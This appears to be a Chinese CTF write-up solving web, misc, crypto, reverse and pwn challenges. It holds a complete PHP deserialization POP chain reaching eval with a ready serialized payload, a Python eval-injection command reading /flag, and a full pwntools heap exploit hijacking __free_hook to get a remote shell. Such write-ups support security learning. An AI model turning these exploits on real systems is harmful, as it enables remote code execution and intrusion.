WEB 题目二名称:EzPop 利用a::__destruct链头开始触发反序列化,然后触发b::__tostring,然后调用c::__call,利用call_user_func_array去调用eval类getshell。
具体payload
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 <?php class evil public function load (e $definition ) { if (class_exists ($definition ->getClassName (), false )) { return ; } eval ("?>" . $definition ->getCode ()); } } class e protected $config ; protected $code ; public function __construct ($config ,$code $this ->config=$config ; $this ->code=$code ; } } class d protected $default ; public function __construct ($default { $this ->default =$default ; } public function __get ($attribute { return $this ->default ; } public function __call ($method , $attributes { return $this ->default ; } } class a const POSITION_START = 0 ; const POSITION_END = 1 ; const POSITION_CURRENT = 2 ; private $_path =123 ; private $_keys = array (); public function __construct ($_keys ,$_path $this ->_keys=$_keys ; $this ->_path=$_path ; } } class b private $name ; private $value ; private $util ; public function __construct ($util ,$value $this ->name="123" ; $this ->util=$util ; $this ->value=$value ; } public function __toString ( { echo "tostring" ; return sprintf ('state(%s(), %s)' , $this ->name, $this ->util->stringify ($this ->value) ); } } class c protected $container ; protected $extensions = []; public function __construct ($container ,$extensions $this ->container=$container ; $this ->extensions=$extensions ; } public function __call ($method , $parameters { $rule = Str ::snake (substr ($method , 8 )); if (isset ($this ->extensions[$rule ])) { return $this ->callExtension ($rule , $parameters ); } throw new BadMethodCallException ("Method [$method ] does not exist." ); } } $b =new b (new c (new d (new evil ()),array ("y" =>"load@load" )),new e (new d ("123" ),"<?=`cat /flag`;" ));$a =new a (array ($b ),$b );echo urlencode ((serialize ($a )));
data=O%3A1%3A%22a%22%3A2%3A%7Bs%3A8%3A%22%00a%00\_path%22%3BO%3A1%3A%22b%22%3A3%3A%7Bs%3A7%3A%22%00b%00name%22%3Bs%3A3%3A%22123%22%3Bs%3A8%3A%22%00b%00value%22%3BO%3A1%3A%22e%22%3A2%3A%7Bs%3A9%3A%22%00%2A%00config%22%3BO%3A1%3A%22d%22%3A1%3A%7Bs%3A10%3A%22%00%2A%00default%22%3Bs%3A3%3A%22123%22%3B%7Ds%3A7%3A%22%00%2A%00code%22%3Bs%3A15%3A%22%3C%3F%3D%60cat+%2Fflag%60%3B%22%3B%7Ds%3A7%3A%22%00b%00util%22%3BO%3A1%3A%22c%22%3A2%3A%7Bs%3A12%3A%22%00%2A%00container%22%3BO%3A1%3A%22d%22%3A1%3A%7Bs%3A10%3A%22%00%2A%00default%22%3BO%3A4%3A%22evil%22%3A0%3A%7B%7D%7Ds%3A13%3A%22%00%2A%00extensions%22%3Ba%3A1%3A%7Bs%3A1%3A%22y%22%3Bs%3A9%3A%22load%40load%22%3B%7D%7D%7Ds%3A8%3A%22%00a%00\_keys%22%3Ba%3A1%3A%7Bi%3A0%3Br%3A2%3B%7D%7D
题目三名称:超级马里奥 右键审计源码发现init.js代码
发现路径存在 /u_found_me_haha
直接请求获取flag
flag{43418584324789516099149302113911}
MISC 题目一名称:calc 下载源码直接审计,发现代码比较简单,且有远程运行环境
nc 访问直接输入key 获取key值
0317dcd25f8916b43998be722434ed14
调用方法2 直接带入key触发eval函数,构造payload如下:
1 2 __import__ ('os' ).system('ls /' )__import__ ('os' ).system('cat /flag' )
题目二名称:eye
flag{b9bb5b2db051d713e307b2b8b98050ae}
思路:foremost对图片进行提取得加密压缩包 -> 压缩包爆破CRC32 -> base64解密 -> silent eye
压缩包密码:ohhhh_you_found_me
解压缩之后,得到key.txt,里面内字符进行base64解密,得到silent eye-key。
Silenteye key:c31d1f23ecec64ac28cc1036066fa1
CRYPTO 题目二名称:babysm1 flag{12541f1c51c9228ca824ecf1f5def14a}
思路:RSA低指数攻击e = 3
1 2 3 4 5 6 7 8 9 e = 3 c = 2217344750798236287989923271111493621814821232365781784992845921175835939916080255971267802993897386183080504406849487970548937348304569582798336704291413362485808165972480022302292463614365892149324677003706817975871653875892621395157463049066727487824595070529224326645861 n = 63916398739042244969298556913752866927345103091746531832160172776924327621386275688870376773848098753349049481579609776026424552613871689909239611712050170593399119845564628346168861169308355368322234316835673432583400422883895605822047092249278927145442473528410586074407793529865400676962006885370537237931 from Functions_Eurynome import * m = RSA_Low_Exponent_e3(c, e, n) print (m) print (long_to_bytes(m).decode())
flag{12541f1c51c9228ca824ecf1f5def14a}
REVERSE 题目一名称:MagicBase 魔改base64
变表+最终结果+1
Dword_53F000运行时值为1
变表:”gBiDkFmHoJqLsNuPwRyT0V2X4Z6b8d+fAhCjElGnIpKrMtOvQxSzU1W3Y5a7c9e/“
对比数据:”v1t4t{x6tltut{CltT2nOEilMUhVS11ut{inOkGlOUOjO11ZOR@#”
解题思路:对比数据-1,使用新表解码获取flag
Flag: 9C73490C-30D3-F48D-04EE-38F61D53B5E87
代码内容:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 import base64import stringenc = "v1t4t{x6tltut{CltT2nOEilMUhVS11ut{inOkGlOUOjO11ZOR@#" dedata = "" for elem in enc: dedata += chr (ord (elem) - 1 ) print (dedata)dedata = "u0s3szw5skstszBksS1mNDhkLTgUR00tszhmNjFkNTNiN00YNQ==" new_table = "gBiDkFmHoJqLsNuPwRyT0V2X4Z6b8d+fAhCjElGnIpKrMtOvQxSzU1W3Y5a7c9e/" old_table = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" print (base64.b64decode(dedata.translate(str .maketrans(new_table,old_table)))))
题目二名称:EzXorCpp C++编写的程序
通过调试可大概了解程序验证流程为:input->倒序->xor 0x70
对比的数据
解题思路:
Enc -> xor 0x70 ->倒序即可获得正确输入
Flag: acd66d8fb8b7b7bd55327a92ef39a9d2
代码内容:
1 2 3 4 5 6 7 8 9 10 11 data=[0x42 ,0x14 ,0x49 ,0x11 ,0x49 ,0x43 ,0x16 ,0x15 ,0x42 ,0x49 ,0x11 ,0x47 ,0x42 ,0x43 ,0x45 ,0x45 ,0x14 ,0x12 ,0x47 ,0x12 ,0x47 ,0x12 ,0x48 ,0x12 ,0x16 ,0x48 ,0x14 ,0x46 ,0x46 ,0x14 ,0x13 ,0x11 ] flag = '' for i in data: flag += chr (i ^ 0x70 ) print (flag)print (flag[::-1 ])
PWN 题目一名称:bookos 分析程序保护全开
Ida分析程序,漏洞点处在delete,edit和show的时候对index没有检测造成越界
这里以edit为例
调试寻找heap附近可用链
发现-7处指向的地方有libc相关地址,于是打印-7泄露libc
进而利用-9处地址修改-26处为free_hook,再利用-26处的free_hook劫持free_hook到system
释放写着/bin/sh的堆块达成利用
Exp
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 from pwn import *context.log_level = 'debug' elf = ELF('./pwn' ) libc = ELF('./libc.so.6' ) def my (): p.recvuntil('name\n' ) p.sendline('aaa' ) p.recvuntil('password\n' ) p.sendline('111' ) p.recvuntil('email\n' ) p.sendline('abc' ) p.recvuntil('do u wanna complete your messages?\n' ) p.sendline('Y' ) p.recvuntil('location\n' ) p.sendline('abcd' ) def add (): p.recvuntil('show\n' ) p.sendline('1' ) def edit (idx, desc ): p.recvuntil('show\n' ) p.sendline('2' ) p.recvuntil('index:\n' ) p.sendline(str (idx)) p.recvuntil('content:\n' ) p.sendline(desc) def edit2 (idx, desc ): p.sendline('2' ) p.recvuntil('index:\n' ) p.sendline(str (idx)) p.recvuntil('content:\n' ) p.sendline(desc) def delete (idx ): p.recvuntil('show\n' ) p.sendline('3' ) p.recvuntil('index:\n' ) p.sendline(str (idx)) def show (idx ): p.recvuntil('show\n' ) p.sendline('4' ) p.recvuntil('index:\n' ) p.sendline(str (idx)) p = remote('1.14.97.218' ,21434 ) my() add() payload = '/bin/sh\x00' edit(0 ,payload) show(-7 ) data = p.recv()[:6 ].ljust(8 , '\x00' ) libc_base = u64(data) - 0xD27960 + 0x39E000 free_hook = libc_base + libc.sym['__free_hook' ] system_addr = libc_base + libc.symbols['system' ] log.success('libc_base:' + hex (libc_base)) log.success('free_hook:' + hex (free_hook)) log.success('system_addr:' + hex (system_addr)) payload = p64(free_hook) edit2(-9 , payload) edit(-26 , p64(system_addr)) delete(0 ) p.interactive()
